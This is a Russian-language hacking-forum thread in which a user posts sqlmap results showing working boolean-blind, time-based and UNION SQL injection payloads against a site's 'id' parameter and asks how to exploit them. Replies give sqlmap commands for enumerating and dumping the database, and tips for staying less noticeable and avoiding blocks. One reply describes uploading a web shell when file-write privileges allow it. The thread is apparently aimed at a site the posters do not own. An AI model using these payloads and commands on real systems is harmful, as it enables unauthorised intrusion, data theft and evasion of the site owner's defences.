ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Как использовать иньекции которые предоставил sqlmap? (https://forum.antichat.xyz/showthread.php?t=564767)

g00db0y 28.08.2018 14:28

Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:


Код:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#

Подскажите, как это можно эксплуатировать?

sudo 28.08.2018 14:33

Цитата:


g00db0y сказал(а):

Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:


Код:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#

Подскажите, как это можно эксплуатировать?


Например подставить значение поля payload в url?

g00db0y 28.08.2018 14:36

Цитата:


sudo сказал(а):

Например подставить значение поля payload в url?


вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло

sudo 28.08.2018 15:02

Цитата:


g00db0y сказал(а):

вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло


Значит прога ошиблась и пейлоады оказались нерабочими. Логично?

g00db0y 28.08.2018 15:10

Цитата:


sudo сказал(а):

Значит прога ошиблась и пейлоады оказались нерабочими. Логично?


А ведь логично, спасибо!

jess_hide 07.09.2018 22:01

А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help

iskus 08.09.2018 01:42

сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет

pr0phet 08.09.2018 12:59

Цитата:


Iskus сказал(а):

сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет


Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке ")

pr0phet 11.10.2018 02:48

Цитата:


qnit сказал(а):

Parameter: id (GET)

sqlmap.py -u "Bigfoot – Leaving Lasting Footprints in the World of Entertainment" --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent


Звездочку только не надо в конце.

leonardocs 14.03.2019 21:32

Цитата:


qnit сказал(а):

тогда --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent -p id


извините за идиотский вопрос, но из-за 10 потоков шанс улететь в блок увеличивается?


Время: 13:59